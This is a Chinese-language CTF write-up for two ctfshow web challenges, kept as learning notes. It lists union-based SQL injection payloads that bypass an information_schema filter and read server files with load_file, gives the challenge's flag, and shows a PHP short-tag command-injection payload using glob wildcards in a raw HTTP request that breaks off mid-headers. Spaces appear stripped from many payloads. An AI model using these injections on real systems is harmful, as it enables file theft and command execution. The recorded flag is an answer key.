ctfshow_web14
一开始也试了传c,但是就试到2,然后以为是源码绕过的,看wp发现是sql注入。
再试到3就能自己发现这个页面了,,,,,,,,
/here_1s_your_f1ag.php
按f12发现:
if(preg_match(‘/information_schema.tables|information_schema.columns|linestring| |polygon/is’, $_GET[‘query’])){
die(‘@A@’);
禁用了information_schema猜是无列名注入
1 2 3
| 1'unionselectdatabase()
1&&sleep(5)
|
字符注入
1 2 3
| 1&&orderby1
0unionselectdatabase()
|
试出是字符注入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| 0unionselectgroup_concat(table_name)frommysql.innodb_table_statswheredatabase()
0unionselect@@version
//alert('10.2.26-MariaDB-log')
0unionselectgroup_concat(table_name)frommysql.innodb_table_stats //alert('gtid_slave_pos,content')
0unionselectgroup_concat(*)fromgtid_slave_pos
0unionselectgroup_concat(1,2,3)fromcontent
0unionselect*fromcontent
0unionselectload_file
|
试一下无列名注入
1 2 3 4 5 6 7
| 0unionselectgroup_concat(1,2,3)from(select1,2,3fromcontent)
0select1,2,3unionselect*fromcontent#
0unionselectgroup_concat(1,2,3)fromcontent
//回显(123,123,123,123)无果
|
看wp:https://blog.csdn.net/m0_55923820/article/details/118783171
原来sql还能加载文件
学到了
1 2 3 4 5 6 7 8 9
| 0unionselectload_file('/var/www/html/secret.php')
0unionselectload_file('/tmp/gtf1y')
0unionselectload_file('/tmp/gtf1y/real_flag_is_here')
0unionselectload_file('/real_flag_is_here') //没想到是直接访问'/real_flag_is_here' //alert('ctfshow{dd04abdc-9d55-4d0d-8d2d-f616f7b82caa}')
|
有无列明注入的版本wp,但我在我的环境没试出来:
https://www.zxcms.com/content/3fcqbuf331l6p0.html
ctfshow 红包题第二弹
这题有点牛逼了
https://www.cnblogs.com/wssw/p/18115718
前面的?>意思是闭合前面的语句。
<?=是echo()的别名用法。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| POST /?cmd=?%3E%3C?=`.%20/??p/p?p??????`; HTTP/1.1 Host: 6fd1fc97-dca5-4a94-8065-2622d4c7ed8d.challenge.ctf.show User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*
|